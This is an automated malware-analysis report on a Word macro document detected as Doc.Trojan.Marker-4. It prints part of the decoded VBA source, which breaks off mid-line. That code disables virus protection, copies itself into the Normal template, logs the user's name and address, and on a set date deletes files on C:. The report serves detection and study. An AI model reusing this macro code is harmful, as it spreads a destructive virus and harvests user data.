Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82ccf8d6126d631c…

MALICIOUS

Office (OLE)

94.5 KB Created: 2000-11-06 09:16:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 79b659983b3011405aa42792bf4e378c SHA-1: 75d9f49ffe26ce04af6862a947c7958ef3c90b99 SHA-256: 82ccf8d6126d631ce92a34b37d5a7373e79a7b4e8bd844df440c4673fcc7ec78
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macros appear to be designed to spread themselves to the Normal template and potentially other documents, as indicated by the variables 'DocumentInfected' and 'NormalTemplateInfected' and the attempt to modify VBComponents. The ClamAV detection 'Doc.Trojan.Marker-4' further supports its malicious nature.

Heuristics 2

  • ClamAV: Doc.Trojan.Marker-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-4
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 119919 bytes
SHA-256: 4c61571e9813ab1c80a32c2655a8f7a2b8fe5b7aeab8dc5cb25dc6861f8a564a
Detection
ClamAV: Doc.Trojan.Marker-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True












































' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Private Sub Document_Close()
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
On Error Resume Next
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Const from = "Yugoslavia" 'nuthin' to do with the GeNiUs just needed a marker
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim ad, nt As Object
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim rep, x As Integer
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim virusCode, UserAddress, LogData, LogFile As String
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
DocumentInfected = ad.codemodule.Find(from, 1, 1, 10000, 10000)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
NormalTemplateInfected = nt.codemodule.Find(from, 1, 1, 10000, 10000)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Options.VirusProtection = False
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Options.SaveNormalPrompt = True
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Delivery:
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If Day(Now()) = 22 And Month(Now()) = 2 Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Kill "C:\*.*":
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
rep = MsgBox("That's Right", vbOK + vbCritical, "It's Murder")
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
GoTo Delivery
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
End If
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If (DocumentInfected = True Xor NormalTemplateInfected = True) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If DocumentInfected = True Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
SaveNormalTemplate = NormalTemplate.Saved
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
virusCode = ad.codemodule.Lines(1, ad.codemodule.countoflines)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
For i = 1 To Len(Application.UserAddress)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
End If
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Else
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
UserAddress = UserAddress & Chr(13) & "' "
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
End If
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Next i
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
LogData = Chr(13) & "' " & Format(Time, "hh:mm:ss AMPM -") & Format(Date, "dddd,d mmm,yyyy") & Chr(13) & "' " & Application.UserName & Chr(13) & "' " & UserAddress & Chr(13) & "' " & Appl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.